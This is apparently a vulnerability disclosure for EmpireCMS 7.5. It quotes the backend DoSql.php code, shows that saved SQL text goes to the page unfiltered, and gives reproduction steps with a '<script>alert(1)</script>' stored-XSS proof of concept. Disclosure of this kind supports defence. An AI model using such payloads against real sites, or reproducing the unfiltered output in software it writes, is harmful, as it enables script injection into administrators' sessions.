Dwonload the EmpireCMS 7.5,open file :\e\admin\db\DoSql.php,look at the code:

File : \e\admin\db\DoSql.php
In line 75 - line 95 AddSql:
-------------------code------------------------------
function AddSql($add,$userid,$username){
	global $empire,$dbtbpre;
	if(!$add['sqlname']||!$add['sqltext'])
	{
		printerror("EmptySqltext","history.go(-1)");
	}
	$add['sqlname']=hRepPostStr($add['sqlname'],1);
	$add[sqltext]=ClearAddsData($add[sqltext]);
	$sql=$empire->query("insert into {$dbtbpre}enewssql(sqlname,sqltext) values('".$add['sqlname']."','".addslashes($add[sqltext])."');");
	$lastid=$empire->lastid();
	if($sql)
	{
		//addlog
		insert_dolog("id=".$lastid."<br>sqlname=".$add[sqlname]);
		printerror("AddSqlSuccess","AddSql.php?enews=AddSql".hReturnEcmsHashStrHref2(0));
	}
	else
	{
		printerror("DbError","history.go(-1)");
	}
}
-------------------code end-----------------------------
Save the input directly, there is no other processing mechanism like filtering?
And
line143 - line195 Sql carried out:
-------------------code------------------------------
function ExecSql($id,$userid,$username){
	global $empire,$dbtbpre;
	$id=(int)$id;
	if(empty($id))
	{
		printerror('EmptyExecSqlid','');
	}
	$r=$empire->fetch1("select sqltext from {$dbtbpre}enewssql where id='$id'");
	if(!$r['sqltext'])
	{
		printerror('EmptyExecSqlid','');
    }
	$query=RepSqlTbpre($r['sqltext']);
	DoRunQuery($query);
	//log
	insert_dolog("query=".$query);
	printerror("DoExecSqlSuccess","ListSql.php".hReturnEcmsHashStrHref2(1));
}

$enews=$_POST['enews'];
if(empty($enews))
{$enews=$_GET['enews'];}
if($enews)
{
	hCheckEcmsRHash();
	@set_time_limit(0);
}
//carried outSQL
if($enews=='DoExecSql')
{
	DoExecSql($_POST,$logininid,$loginin);
}
elseif($enews=='AddSql')//add
{
	AddSql($_POST,$logininid,$loginin);
}
elseif($enews=='EditSql')//edit
{
	EditSql($_POST,$logininid,$loginin);
}
elseif($enews=='DelSql')//del
{
	DelSql($_GET['id'],$logininid,$loginin);
}
elseif($enews=='ExecSql')//carried out
{
	ExecSql($_GET['id'],$logininid,$loginin);
}

$url="<a href=DoSql.php".$ecms_hashur['whehref'].">carried out SQL</a>";
db_close();
$empire=null;
?>
-------------------code end------------------------------
Judge whether the sql syntax is correct, and  continue to execute other content,The output page is also not filtered.
----Use----
Installation EmpireCMS 7.5, at backstage management - SQL execution,Insert attack command.
Url:http://127.0.0.2:8080/e/admin/admin.php?ehash_ZggST=fK6I2xSKLEmuO6qZXF9A
Payload(mine is html ):
-------Html code----
<html>
test
</html>
-------------Code end------
Display SQL command error,but other scripts will continue to execute,and add SQL:
Payload:
-------code-------
<script>alert(1)</script>
-----code end--------
Carried out success,f12 can see that the code has been parsed.
